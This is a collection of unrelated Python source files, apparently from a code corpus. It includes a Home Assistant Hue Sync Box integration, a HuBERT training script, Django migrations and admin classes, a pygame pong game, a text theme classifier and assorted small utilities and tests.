self._skp.delete_trust_to_karbor(auth_info['trust_id'])
self._del_user_trust_info(context.user_id, context.project_id)
def resume_operation(self, operation_id, user_id, project_id, trust_id):
auth_info = self._get_user_trust_info(user_id, project_id)
if auth_info:
auth_info['operation_ids'].add(operation_id)
return
try:
lsession = self._skp.create_trust_session(trust_id)
except Exception:
raise
self._add_user_trust_info(user_id, project_id,
operation_id, trust_id, lsession)
| 3,742 | 1,184 |
"""The Philips Hue Play HDMI Sync Box integration."""
import asyncio
import logging
import json
import os
import voluptuous as vol
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers import (config_validation as cv)
from homeassistant.helpers.config_validation import make_entity_service_schema
from homeassistant.helpers.service import async_extract_entity_ids
from homeassistant.components.light import ATTR_BRIGHTNESS, ATTR_BRIGHTNESS_STEP
from .huesyncbox import HueSyncBox, async_remove_entry_from_huesyncbox
from .const import DOMAIN, LOGGER, ATTR_SYNC, ATTR_SYNC_TOGGLE, ATTR_MODE, ATTR_MODE_NEXT, ATTR_MODE_PREV, MODES, ATTR_INTENSITY, ATTR_INTENSITY_NEXT, ATTR_INTENSITY_PREV, INTENSITIES, ATTR_INPUT, ATTR_INPUT_NEXT, ATTR_INPUT_PREV, INPUTS, ATTR_ENTERTAINMENT_AREA, SERVICE_SET_SYNC_STATE, SERVICE_SET_BRIGHTNESS, SERVICE_SET_MODE, SERVICE_SET_INTENSITY, SERVICE_SET_ENTERTAINMENT_AREA
CONFIG_SCHEMA = vol.Schema({DOMAIN: vol.Schema({})}, extra=vol.ALLOW_EXTRA)
PLATFORMS = ["media_player"]
HUESYNCBOX_SET_STATE_SCHEMA = make_entity_service_schema(
{
vol.Optional(ATTR_SYNC): cv.boolean,
vol.Optional(ATTR_SYNC_TOGGLE): cv.boolean,
vol.Optional(ATTR_BRIGHTNESS): cv.small_float,
vol.Optional(ATTR_BRIGHTNESS_STEP): vol.All(vol.Coerce(float), vol.Range(min=-1, max=1)),
vol.Optional(ATTR_MODE): vol.In(MODES),
vol.Optional(ATTR_MODE_NEXT): cv.boolean,
vol.Optional(ATTR_MODE_PREV): cv.boolean,
vol.Optional(ATTR_INTENSITY): vol.In(INTENSITIES),
vol.Optional(ATTR_INTENSITY_NEXT): cv.boolean,
vol.Optional(ATTR_INTENSITY_PREV): cv.boolean,
vol.Optional(ATTR_INPUT): vol.In(INPUTS),
vol.Optional(ATTR_INPUT_NEXT): cv.boolean,
vol.Optional(ATTR_INPUT_PREV): cv.boolean,
vol.Optional(ATTR_ENTERTAINMENT_AREA): cv.string,
}
)
HUESYNCBOX_SET_BRIGHTNESS_SCHEMA = make_entity_service_schema(
{vol.Required(ATTR_BRIGHTNESS): cv.small_float}
)
HUESYNCBOX_SET_MODE_SCHEMA = make_entity_service_schema(
{vol.Required(ATTR_MODE): vol.In(MODES)}
)
HUESYNCBOX_SET_INTENSITY_SCHEMA = make_entity_service_schema(
{vol.Required(ATTR_INTENSITY): vol.In(INTENSITIES), vol.Optional(ATTR_MODE): vol.In(MODES)}
)
HUESYNCBOX_SET_ENTERTAINMENT_AREA_SCHEMA = make_entity_service_schema(
{vol.Required(ATTR_ENTERTAINMENT_AREA): cv.string}
)
services_registered = False
async def async_setup(hass: HomeAssistant, config: dict):
"""
Set up the Philips Hue Play HDMI Sync Box integration.
Only supporting zeroconf, so nothing to do here.
"""
hass.data[DOMAIN] = {}
return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry):
"""Set up a config entry for Philips Hue Play HDMI Sync Box."""
LOGGER.debug("%s async_setup_entry\nentry:\n%s\nhass.data\n%s" % (__name__, str(entry), hass.data[DOMAIN]))
huesyncbox = HueSyncBox(hass, entry)
hass.data[DOMAIN][entry.data["unique_id"]] = huesyncbox
if not await huesyncbox.async_setup():
return False
for platform in PLATFORMS:
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(entry, platform)
)
# Register services on first entry
global services_registered
if not services_registered:
await async_register_services(hass)
services_registered = True
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry):
"""Unload a config entry."""
unload_ok = all(
await asyncio.gather(
*[
hass.config_entries.async_forward_entry_unload(entry, platform)
for platform in PLATFORMS
]
)
)
if unload_ok:
huesyncbox = hass.data[DOMAIN].pop(entry.data["unique_id"])
await huesyncbox.async_reset()
# Unregister services when last entry is unloaded
if len(hass.data[DOMAIN].items()) == 0:
await async_unregister_services(hass)
global services_registered
services_registered = False
return unload_ok
async def async_remove_entry(hass: HomeAssistant, entry: ConfigEntry) -> None:
# Best effort cleanup. User might not even have the device anymore or had it factory reset.
# Note that the entry already has been unloaded.
try:
await async_remove_entry_from_huesyncbox(entry)
except Exception as e:
LOGGER.warning("Unregistering Philips Hue Play HDMI Sync Box failed: %s ", e)
async def async_register_services(hass: HomeAssistant):
async def async_set_sync_state(call):
entity_ids = await async_extract_entity_ids(hass, call)
for _, entry in hass.data[DOMAIN].items():
if entry.entity and entry.entity.entity_id in entity_ids:
await entry.entity.async_set_sync_state(call.data)
hass.services.async_register(
DOMAIN, SERVICE_SET_SYNC_STATE, async_set_sync_state, schema=HUESYNCBOX_SET_STATE_SCHEMA
)
async def async_set_sync_mode(call):
entity_ids = await async_extract_entity_ids(hass, call)
for _, entry in hass.data[DOMAIN].items():
if entry.entity and entry.entity.entity_id in entity_ids:
await entry.entity.async_set_sync_mode(call.data.get(ATTR_MODE))
hass.services.async_register(
DOMAIN, SERVICE_SET_MODE, async_set_sync_mode, schema=HUESYNCBOX_SET_MODE_SCHEMA
)
async def async_set_intensity(call):
entity_ids = await async_extract_entity_ids(hass, call)
for _, entry in hass.data[DOMAIN].items():
if entry.entity and entry.entity.entity_id in entity_ids:
await entry.entity.async_set_intensity(call.data.get(ATTR_INTENSITY), call.data.get(ATTR_MODE, None))
hass.services.async_register(
DOMAIN, SERVICE_SET_INTENSITY, async_set_intensity, schema=HUESYNCBOX_SET_INTENSITY_SCHEMA
)
async def async_set_brightness(call):
entity_ids = await async_extract_entity_ids(hass, call)
for _, entry in hass.data[DOMAIN].items():
if entry.entity and entry.entity.entity_id in entity_ids:
await entry.entity.async_set_brightness(call.data.get(ATTR_BRIGHTNESS))
hass.services.async_register(
DOMAIN, SERVICE_SET_BRIGHTNESS, async_set_brightness, schema=HUESYNCBOX_SET_BRIGHTNESS_SCHEMA
)
async def async_set_entertainment_area(call):
entity_ids = await async_extract_entity_ids(hass, call)
for _, entry in hass.data[DOMAIN].items():
if entry.entity and entry.entity.entity_id in entity_ids:
await entry.entity.async_select_entertainment_area(call.data.get(ATTR_ENTERTAINMENT_AREA))
hass.services.async_register(
DOMAIN, SERVICE_SET_ENTERTAINMENT_AREA, async_set_entertainment_area, schema=HUESYNCBOX_SET_ENTERTAINMENT_AREA_SCHEMA
)
async def async_unregister_services(hass):
hass.services.async_remove(DOMAIN, SERVICE_SET_SYNC_STATE)
hass.services.async_remove(DOMAIN, SERVICE_SET_BRIGHTNESS)
hass.services.async_remove(DOMAIN, SERVICE_SET_MODE)
hass.services.async_remove(DOMAIN, SERVICE_SET_INTENSITY)
hass.services.async_remove(DOMAIN, SERVICE_SET_ENTERTAINMENT_AREA)
| 7,309 | 2,566 |
#!/usr/bin/env python3
"""Train the HuBERTPretrainModel by using labels generated by KMeans clustering.
Example:
python train.py --root-path ./exp/data/mfcc/ --feature-type mfcc --num-classes 100
"""
import logging
import pathlib
from argparse import (
ArgumentDefaultsHelpFormatter,
ArgumentParser,
RawDescriptionHelpFormatter,
)
from typing import Optional, Tuple
from lightning import HuBERTPreTrainModule
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks import ModelCheckpoint
logger = logging.getLogger(__name__)
class _Formatter(ArgumentDefaultsHelpFormatter, RawDescriptionHelpFormatter):
# To use ArgumentDefaultsHelpFormatter as the formatter_class and
# RawDescriptionHelpFormatter to add custom formatting to description or epilog.
# Check: https://stackoverflow.com/a/18462760
pass
def run_train(args):
checkpoint_dir = args.exp_dir / f"checkpoints_{args.dataset}_{args.model_name}"
checkpoint = ModelCheckpoint(
checkpoint_dir,
monitor="Losses/val_loss",
mode="min",
save_top_k=5,
save_weights_only=False,
verbose=True,
)
train_checkpoint = ModelCheckpoint(
checkpoint_dir,
monitor="Losses/train_loss",
mode="min",
save_top_k=5,
save_weights_only=False,
verbose=True,
)
callbacks = [
checkpoint,
train_checkpoint,
]
trainer = Trainer(
default_root_dir=args.exp_dir,
max_steps=args.max_updates,
num_nodes=args.num_nodes,
gpus=args.gpus,
accelerator="gpu",
strategy="ddp",
replace_sampler_ddp=False,
gradient_clip_val=args.clip_norm,
callbacks=callbacks,
reload_dataloaders_every_n_epochs=1,
)
model = HuBERTPreTrainModule(
model_name=args.model_name,
feature_grad_mult=args.feature_grad_mult,
num_classes=args.num_classes,
dataset=args.dataset,
root_path=args.root_path,
feature_type=args.feature_type,
seconds_per_batch=args.seconds_per_batch,
learning_rate=args.learning_rate,
betas=args.betas,
eps=args.eps,
weight_decay=args.weight_decay,
warmup_updates=args.warmup_updates,
max_updates=args.max_updates,
)
trainer.fit(model, ckpt_path=args.resume_checkpoint)
def _parse_args():
parser = ArgumentParser(
description=__doc__,
formatter_class=_Formatter,
)
parser.add_argument(
"--root-path",
type=pathlib.Path,
required=True,
help="Path to the feature and label directories.",
)
parser.add_argument(
"--resume-checkpoint",
type=Optional[pathlib.Path],
default=None,
help="Path to the feature and label directories. (Default: None)",
)
parser.add_argument(
"--feature-type",
choices=["mfcc", "hubert"],
type=str,
required=True,
)
parser.add_argument(
"--feature-grad-mult",
default=0.1,
type=float,
help="The scaling factor to multiply the feature extractor gradient. (Default: 0.1)",
)
parser.add_argument(
"--num-classes",
choices=[100, 500],
type=int,
required=True,
help="The ``num_class`` when building the hubert_pretrain_base model.",
)
parser.add_argument(
"--model-name",
default="hubert_pretrain_base",
choices=["hubert_pretrain_base", "hubert_pretrain_large", "hubert_pretrain_xlarge"],
type=str,
help="The HuBERT model to train. (Default: 'hubert_pretrain_base')",
)
parser.add_argument(
"--exp-dir",
default=pathlib.Path("./exp"),
type=pathlib.Path,
help="Directory to save checkpoints and logs to. (Default: './exp')",
)
parser.add_argument(
"--dataset",
default="librispeech",
choices=["librispeech", "librilight"],
type=str,
help="The dataset for training. (Default: 'librispeech')",
)
parser.add_argument(
"--learning-rate",
default=0.0005,
type=float,
help="The peak learning rate. (Default: 0.0005)",
)
parser.add_argument(
"--betas",
default=(0.9, 0.98),
type=Tuple,
help="The coefficients for computing running averages of gradient and its square (Default: (0.9, 0.98))",
)
parser.add_argument(
"--eps",
default=1e-6,
type=float,
help="Epsilon value in Adam optimizer. (Default: 1e-6)",
)
parser.add_argument(
"--weight-decay",
default=0.01,
type=float,
help="Weight decay (L2 penalty) (default: 0.01)",
)
parser.add_argument(
"--clip-norm",
default=None,
type=Optional[float],
help="The gradient norm value to clip. (Default: None)",
)
parser.add_argument(
"--num-nodes",
default=4,
type=int,
help="Number of nodes to use for training. (Default: 4)",
)
parser.add_argument(
"--gpus",
default=8,
type=int,
help="Number of GPUs per node to use for training. (Default: 8)",
)
parser.add_argument(
"--warmup-updates",
default=32000,
type=int,
help="Number of steps for warm up the learning rate. (Default: 32000)",
)
parser.add_argument(
"--max-updates",
default=250000,
type=int,
help="Total number of training steps. (Default: 250000)",
)
parser.add_argument(
"--seconds-per-batch",
default=87.5,
type=float,
help="Number of seconds of audio in a mini-batch. (Default: 87.5)",
)
parser.add_argument("--debug", action="store_true", help="whether to use debug level for logging")
return parser.parse_args()
def _init_logger(debug):
fmt = "%(asctime)s %(message)s" if debug else "%(message)s"
level = logging.DEBUG if debug else logging.INFO
logging.basicConfig(format=fmt, level=level, datefmt="%Y-%m-%d %H:%M:%S")
def cli_main():
args = _parse_args()
_init_logger(args.debug)
run_train(args)
if __name__ == "__main__":
cli_main()
| 6,278 | 2,033 |
import torch
def proxyless_nas_mobile(args):
target_platform = "proxyless_mobile" # proxyless_gpu, proxyless_mobile, proxyless_mobile14 are also avaliable.
if args.pretrained:
model = torch.hub.load('mit-han-lab/ProxylessNAS', target_platform, pretrained=True)
print("ImageNet pretrained ProxylessNAS-Mobile loaded! (Pretrained Top-1 Acc: 74.59%)")
else:
model = torch.hub.load('mit-han-lab/ProxylessNAS', target_platform, pretrained=False)
return model
| 495 | 172 |
'''
Created on 22 Dec 2019
@author: ody
'''
import unittest
from utils.Assrt import Eq, AssertErr, XdArrParser
class Test(unittest.TestCase):
def testArrEq(self):
eq = Eq()
try:
eq.int2dArr([[]], [[1]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[]], [])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[1]], [[]])
self.fail("Error not checked")
except AssertErr as e:
# [] not in [[1]]
print(e)
try:
eq.int2dArr([[2]], [[1]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[2], [1]], [[1], [3]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[1]], [[1, 2]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[1, 2], [2, 1], [1, 3, 5]], [[2, 1], [1, 2], [3, 1, 6]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[1, 2], [2, 1], [1, 3, 6], [0]], [[2, 1], [1, 2], [3, 1, 6]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[1, 2], [2, 1], [1, 3, 6], [0]], [[2, 1], [1, 2], [3, 1, 6], [1]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
eq.int2dArr([], [])
eq.int2dArr([[]], [[]])
eq.int2dArr([[1, 2]], [[2, 1]])
eq.int2dArr([[1, 2], [2, 1]], [[2, 1], [1, 2]])
eq.int2dArr([[1, 2], [2, 1], [1, 3, 4]], [[2, 1], [1, 2], [3, 1, 4]])
def testPasrsArr(self):
eq = Eq()
parse2d = XdArrParser(2)
a2d = parse2d.parseInt("[[1,2],[3]]")
print(a2d)
eq.int2dArr([[1,2], [3]], a2d)
a2d = parse2d.parseInt("[[1],[3]]")
eq.int2dArr([[1], [3]], a2d)
a2d = parse2d.parseInt("[[1],[3,1]]")
eq.int2dArr([[1], [3,1]], a2d)
a2d = parse2d.parseInt("[[1],[3,1]]")
eq.int2dArr([[1], [1,3]], a2d)
a2d = parse2d.parseInt("[[1,3],[3,1]]")
eq.int2dArr([[1,3], [1,3]], a2d)
a2d = parse2d.parseInt("[[1,3],[]]")
eq.int2dArr([[1,3], []], a2d)
a2d = parse2d.parseInt("[[],[]]")
eq.int2dArr([[], []], a2d)
a2d = parse2d.parseInt("[[1],[2], [3]]")
eq.int2dArr([[1], [2], [3]], a2d)
a2d = parse2d.parseInt("[[1], [2, 3, 4, 5, 6, 7], [3]]")
eq.int2dArr([[1], [3], [2, 3, 4, 5, 6, 7]], a2d)
a2d = parse2d.parseInt("[[1], [2, 3, 4, 5, 6, 7], [10, 12]]")
eq.int2dArr([[1], [10, 12], [2, 3, 4, 5, 6, 7]], a2d)
def testParse3d(self):
eq = Eq()
parse3d = XdArrParser(3)
a3d = parse3d.parseInt("[[[1],[3,1]]]")
print(a3d)
eq.int2dArr([[1], [1,3]], a3d[0])
class TestFile(unittest.TestCase):
def testAssertFile(self):
eq = Eq()
eq.int2dArrFile('data/case01.txt', 2)
eq.int2dArrFile('data/case02.txt', 2)
eq.int2dArrFile('data/case03.txt', 2)
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main() | 3,504 | 1,478 |
# Generated by Django 4.0.3 on 2022-05-03 21:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('home', '0016_rename_restaurantfeatures_restaurantfeature'),
]
operations = [
migrations.RemoveField(
model_name='restaurant',
name='date',
),
migrations.RemoveField(
model_name='restaurant',
name='start_time',
),
migrations.AddField(
model_name='restaurant',
name='city',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name='restaurant',
name='contact',
field=models.BigIntegerField(blank=True, max_length=10, null=True),
),
migrations.AddField(
model_name='restaurant',
name='pincode',
field=models.IntegerField(blank=True, max_length=6, null=True),
),
migrations.AddField(
model_name='restaurant',
name='state',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='restaurantfeature',
name='restaurant',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='features', to='home.restaurant'),
),
]
| 1,474 | 444 |
from tkinter import *
window = Tk()
def open_menu_window():
pass
# Window configs
window.title("Azzy001 : Menu Window")
window.geometry("440x520")
window.resizable(0, 0)
window.attributes("-topmost", True)
window.mainloop() | 246 | 99 |
def anagram(s1, s2):
result = False #set your base
if len(s1) == len(s2): #can't be anagrams if diff length
count = 0 #used to check for matches
i = 0
while i < len(s1): #'outer loop' for s1
j = 0
while j < len(s2): #'inner loop' to check every s2 letter for each s1 letter
if s1[i:i+1] == s2[j:j+1]: #if theres a match
count += 1 #++ count
j += 1
i += 1
if count == len(s1): #if count == s1len then it means they must have the exact same letters
result = True
return result
anagram("jack","kabj")
| 701 | 221 |
from pygame import *
win_width=600
win_height=500
class GameSprite(sprite.Sprite):
def __init__(self, player_image, player_x, player_y, size_x, size_y, player_speed ):
super().__init__()
self.image = transform.scale(image.load(player_image), (size_x, size_y))
self.speed = player_speed
self.rect = self.image.get_rect()
self.rect.x = player_x
self.rect.y = player_y
def reset(self):
window.blit(self.image, (self.rect.x, self.rect.y))
class Player(GameSprite):
def updatel(self):
keys = key.get_pressed()
if keys[K_w] and self.rect.y > 5:
self.rect.y -= self.speed
if keys[K_s] and self.rect.y < win_height - 80:
self.rect.y += self.speed
def updater(self):
keys = key.get_pressed()
if keys[K_UP] and self.rect.y > 5:
self.rect.y -= self.speed
if keys[K_DOWN] and self.rect.y < win_height - 80:
self.rect.y += self.speed
back=(200, 255, 255)
window=display.set_mode((win_width, win_height))
window.fill(back)
p_l= Player('racket.png', 30, 200, 10, 80, 10)
p_r= Player('racket.png', 520, 200, 10, 80, 10)
ball=GameSprite('tenis_ball.png', 200, 200, 30, 30, 70)
font.init()
font = font.SysFont("Areal", 35)
win1 = font.render('Player 1 Win!', True, (230, 255, 0))
win2 = font.render('Player 2 Win!', True, (230, 255, 0))
speed_x=3
speed_y=3
game=True
finish=False
clock=time.Clock()
FPS=60
while game:
for e in event.get():
if e.type == QUIT:
game = False
if finish != True:
window.fill(back)
p_l.updatel()
p_r.updater()
ball.rect.x += speed_x
ball.rect.y += speed_y
if sprite.collide_rect(p_l, ball) or sprite.collide_rect(p_r, ball):
speed_x*=-1
if ball.rect.y > win_height-50 or ball.rect.y < 0:
speed_y *=-1
if ball.rect.x < 0:
finish=True
window.blit(win2, (200,200))
if ball.rect.x > win_width:
finish=True
window.blit(win1, (200,200))
p_l.reset()
p_r.reset()
ball.reset()
display.update()
clock.tick(FPS) | 2,298 | 970 |
from django.contrib import admin
from datetime import *
from companies.models import Sector, IndustryGroup, Industry, SubIndustry
from companies.models import Company, Ownership, Director, Executive, CompanyNameChange
class SectorAdmin(admin.ModelAdmin):
search_fields=["name",]
list_display = ('name', 'symbol', 'custom')
admin.site.register(Sector, SectorAdmin)
class IndustryGroupAdmin(admin.ModelAdmin):
search_fields=["name",]
list_display = ('name', 'symbol', 'sector', 'custom')
admin.site.register(IndustryGroup, IndustryGroupAdmin)
class IndustryAdmin(admin.ModelAdmin):
search_fields=["name",]
list_display = ('name', 'symbol', 'industry_group', 'sector', 'custom')
admin.site.register(Industry, IndustryAdmin)
class SubIndustryAdmin(admin.ModelAdmin):
search_fields=["name",]
list_display = ('name', 'symbol', 'industry', 'custom')
admin.site.register(SubIndustry, SubIndustryAdmin)
class CompanyNameChangeAdmin(admin.ModelAdmin):
search_fields=["company__name", "name_before", "name_after"]
list_display = ('company', 'date', 'name_before', 'name_after')
list_filter=['date']
admin.site.register(CompanyNameChange, CompanyNameChangeAdmin)
class CompanyAdmin(admin.ModelAdmin):
search_fields=["name",]
prepopulated_fields = { 'slug_name': ['name'] }
list_filter=['country', 'is_auditor']
list_display = ('name', 'country', 'company_type', 'sub_industry')
admin.site.register(Company, CompanyAdmin)
class OwnershipAdmin(admin.ModelAdmin):
search_fields=["name",]
admin.site.register(Ownership, OwnershipAdmin)
# People
class DirectorAdmin(admin.ModelAdmin):
search_fields=["company__name", "person__first_name", "person__last_name", "person__other_names"]
admin.site.register(Director, DirectorAdmin)
class ExecutiveAdmin(admin.ModelAdmin):
search_fields=["company__name", "person__first_name", "person__last_name", "person__other_names"]
admin.site.register(Executive, ExecutiveAdmin)
class DirectorInline(admin.TabularInline):
model = Director
class ExecutivesInline(admin.TabularInline):
model = Executive
| 2,121 | 660 |
import operator
import requests
from ocd_backend.enrichers.text_enricher.tasks import BaseEnrichmentTask
from ocd_backend.models.definitions import Meeting as MeetingNS, Rdf
from ocd_backend.models.misc import Uri
from ocd_backend.settings import ORI_CLASSIFIER_HOST, ORI_CLASSIFIER_PORT
from ocd_backend.utils.http import HttpRequestMixin
from ocd_backend.log import get_source_logger
log = get_source_logger('theme_classifier')
class ThemeClassifier(BaseEnrichmentTask, HttpRequestMixin):
def enrich_item(self, item):
if not ORI_CLASSIFIER_HOST or not ORI_CLASSIFIER_PORT:
# Skip classifier if no host is specified
return
ori_classifier_url = 'http://{}:{}/classificeer'.format(ORI_CLASSIFIER_HOST, ORI_CLASSIFIER_PORT)
if not hasattr(item, 'text'):
return
text = item.text
if type(item.text) == list:
text = ' '.join(text)
if not text or len(text) < 76:
return
identifier_key = 'result'
request_json = {
'ori_identifier': identifier_key, # not being used
'name': text
}
try:
response = self.http_session.post(ori_classifier_url, json=request_json)
response.raise_for_status()
except requests.ConnectionError:
# Return if no connection can be made
log.warning('No connection to theme classifier')
return
response_json = response.json()
theme_classifications = response_json.get(identifier_key, [])
# Do not try this at home
tags = {
'@id': '%s#tags' % item.get_ori_identifier(),
'@type': str(Uri(Rdf, 'Seq'))
}
i = 0
for name, value in sorted(theme_classifications.items(), key=operator.itemgetter(1), reverse=True):
tag = {
'@id': '%s#tags_%s' % (item.get_ori_identifier(), i),
'@type': str(Uri(MeetingNS, 'TagHit')),
str(Uri(MeetingNS, 'tag')): name,
str(Uri(MeetingNS, 'score')): value,
}
tags[str(Uri(Rdf, '_%s' % i))] = tag
i += 1
# No really, don't
item.tags = tags
| 2,234 | 690 |
"""
YOU ONLY TRAIN ONCE: LOSS-CONDITIONAL TRAINING OF DEEP NETWORKS
# https://openreview.net/pdf?id=HyxY6JHKwr
For YOTO models, we condition the last layer of each convolutional block.
The conditioning MLP has one hidden layer with 256 units on Shapes3D and 512 units on CIFAR-10.
At training time we sample the β parameter from log-normal distribution on the interval [0.125, 1024.]
for Shapes3D and on the interval [0.125, 512.] for CIFAR-10.
FiLM: Visual Reasoning with a General Conditioning Layer
# https://arxiv.org/pdf/1709.07871.pdf
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
class MLP(nn.Module):
def __init__(self, n_input, n_output, hidden_neurons=(512,), dropout_rate=0.1):
super(MLP, self).__init__()
n_neurons = (n_input,) + hidden_neurons + (n_output,)
self.layers = nn.ModuleList()
for i in range(len(n_neurons) - 1):
self.layers.append(nn.Linear(n_neurons[i], n_neurons[i+1]))
#self.layers.append(nn.BatchNorm1d(n_neurons[i+1]))
self.act = nn.ReLU(inplace=True)
self.dropout = nn.Dropout(dropout_rate)
def forward(self, x):
h = x
for i in range(len(self.layers)-1):
h = self.dropout(self.act(self.layers[i](h)))
h = self.layers[-1](h)
return h
class MultiheadMLP(nn.Module):
def __init__(self, n_input, n_outputs=(16, 32),
common_hidden_neurons=(64,),
multi_head_hidden_neurons=((128, 16), (128, 32)),
dropout_rate=0.1):
super(MultiheadMLP, self).__init__()
n_head = len(n_outputs)
# common layer
if common_hidden_neurons is not None:
com_neurons = (n_input,) + common_hidden_neurons
self.com_layers = []
for i in range(len(com_neurons) - 1):
self.com_layers.append(nn.Linear(com_neurons[i], com_neurons[i+1]))
#self.com_layers.append(nn.BatchNorm1d(com_neurons[i+1]))
self.com_layers.append(nn.ReLU(inplace=True))
self.com_layers.append(nn.Dropout(dropout_rate))
self.com_layers = nn.Sequential(*self.com_layers)
else:
com_neurons = (n_input,)
self.com_layers = None
# multi head layer
self.head_layers = nn.ModuleList()
for ih in range(n_head):
if multi_head_hidden_neurons is not None and multi_head_hidden_neurons[ih] is not None:
h_neurons = (com_neurons[-1],) + multi_head_hidden_neurons[ih] + (n_outputs[ih],)
else:
h_neurons = (com_neurons[-1],) + (n_outputs[ih],)
h_layers = []
for i in range(len(h_neurons) - 1):
h_layers.append(nn.Linear(h_neurons[i], h_neurons[i+1]))
if i < len(h_neurons) - 2:
#h_layers.append(nn.BatchNorm1d(h_neurons[i+1]))
h_layers.append(nn.ReLU(inplace=True))
h_layers.append(nn.Dropout(dropout_rate))
self.head_layers.append(nn.Sequential(*h_layers))
def forward(self, x):
if self.com_layers is not None:
h = self.com_layers(x)
else:
h = x
hs = []
for ly in self.head_layers:
hs.append(ly(h))
return hs
| 3,465 | 1,304 |
XSym
0078
350008fd8e0cf4fdaa063759c1fd071b
/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/_weakrefset.py
| 1,067 | 129 |
import collections
import pandas as pd
import numpy as np
import re
import os
def count(fl,target='input_context',checks='input_keyword', vocab_size=10000):
cnter = collections.Counter()
s = set()
for filename in fl:
cur_df = pd.read_pickle(filename)
texts = cur_df[target].tolist()
for i in texts:
cnter.update(i[1:])
s.add(i[0])
#check
for filename in fl:
cur_df = pd.read_pickle(filename)
for check in checks:
texts = cur_df[check].tolist()
for i in texts:
s.update(i)
for i in s:
if i not in cnter:
cnter[i] = 1
for i in range(vocab_size):
if i not in cnter:
cnter[i] = 1
tot = 0
cum_prob = [0]
for i in cnter.most_common():
tot += i[1]
for i in cnter.most_common():
cum_prob.append(cum_prob[-1] + i[1] / tot)
cum_prob.pop(0)
new_dict = dict([(int(old[0]), int(new)) for (new, old) in enumerate(cnter.most_common())])
return cum_prob, new_dict
def convert_and_save(fl,dic,targets:list):
for filename in fl:
cur_df = convert_idx(filename,dic,targets)
new_filename = re.sub(r'indexed/','indexed_new/',filename)
if not os.path.exists(os.path.dirname(new_filename)):
os.makedirs(os.path.dirname(new_filename))
cur_df.to_pickle(new_filename)
def convert_idx(filename, dic, targets:list):
key_type = type(list(dic)[0])
cur_df = pd.read_pickle(filename)
for target in targets:
new = []
for line in cur_df[target].tolist():
converted = []
for token in line:
converted.append(dic[key_type(token)])
new.append(converted)
cur_df[target] = new
return cur_df
def old_compute_cutoffs(probs,n_cutoffs):
cutoffs = []
cut_prob = 1/n_cutoffs
cnt = 0
target_probs = cut_prob
for idx,prob in enumerate(probs):
if prob>target_probs:
cutoffs.append(idx + 1)
target_probs += cut_prob
cnt +=1
if cnt >= n_cutoffs -1:
break
return cutoffs
def uniform_cutoffs(probs,n_cutoffs):
per_cluster_n = len(probs) // n_cutoffs
return [per_cluster_n * i for i in range(1,n_cutoffs)]
def compute_cutoffs(probs,n_cutoffs):
def rebalance_cutprob():
remaining_prob = 1 - prior_cluster_prob
n = n_cutoffs - cnt
return remaining_prob / n
cutoffs = []
probs = probs
cut_prob = 1/n_cutoffs
cnt = 0
prior_cluster_prob = 0.0
prior_idx = 0
for idx, prob in enumerate(probs):
cluster_cumprob = prob - prior_cluster_prob
if cluster_cumprob > cut_prob:
if idx != prior_idx:
cutoffs.append(idx)
prior_cluster_prob = probs[idx-1]
prior_idx = idx
else:
cutoffs.append(idx+1)
prior_cluster_prob = probs[idx]
prior_idx = idx + 1
cnt += 1
cut_prob = rebalance_cutprob()
if cnt >= n_cutoffs -1:
break
return cutoffs
def cumulative_to_indivisual(cum_prob):
cum_prob.insert(0, 0)
new = []
for i in range(1,len(cum_prob)):
new.append(cum_prob[i] - cum_prob[i - 1])
cum_prob.pop(0)
return new
def normalized_entropy(x):
if len(x) ==1:
return 1.0
x = np.array(x)
x = x / np.sum(x)
entropy = -np.sum(x*np.log2(x))
z = np.log2(len(x))
return entropy / z
def cluster_probs(probs,cutoffs):
p = [probs[cutoffs[0]-1]]
for l,r in zip(cutoffs[:-1], cutoffs[1:]):
p.append(probs[r-1]-probs[l-1])
p.append(1.0-probs[cutoffs[-1]])
return p
def ideal_cutoffs(probs,lower=2,upper=None):
ind_probs = cumulative_to_indivisual(probs)
ideal = None
max_mean = 0
if not upper:
upper = int(1 / probs[0])
for target in range(lower,upper+1):
mean = []
cutoffs = compute_cutoffs(probs,target)
added_cutoffs = [0] + cutoffs + [len(probs)]
for i in range(target):
cluster = ind_probs[added_cutoffs[i]:added_cutoffs[i + 1]]
mean.append(normalized_entropy(cluster))
cluster_prob = cluster_probs(probs,cutoffs)
head = normalized_entropy(cluster_prob)
tail = np.sum(np.array(mean)) / np.array(mean).nonzero()[0].size
mean = head * tail
# print(head, tail, mean)
if mean > max_mean:
max_mean = mean
ideal = cutoffs
return ideal
| 4,616 | 1,637 |
# Aula 06-A
# Tipos Primitivos e Saída de Dados
n1 = int(input('\033[0;30;47mDigite um número:\033[m'))
n2 = int(input('\033[0;30;47mDigite outro número:\033[m'))
s = n1 + n2
print('\033[4;36;40mA soma entre {} e {} vale {}\033[m'.format(n1, n2, s)) | 250 | 136 |
##
# Copyright (c) 2012 Sprymix Inc.
# All rights reserved.
#
# See LICENSE for details.
##
import importlib
import pickle
import sys
import types
import unittest
from importkit.import_ import module as module_utils
from importkit.import_ import utils as import_utils
class TestLangImportModuleProxy(unittest.TestCase):
def test_lang_import_module_light_proxy(self):
mod = importlib.import_module(__package__ + '.testdata.proxiedmod')
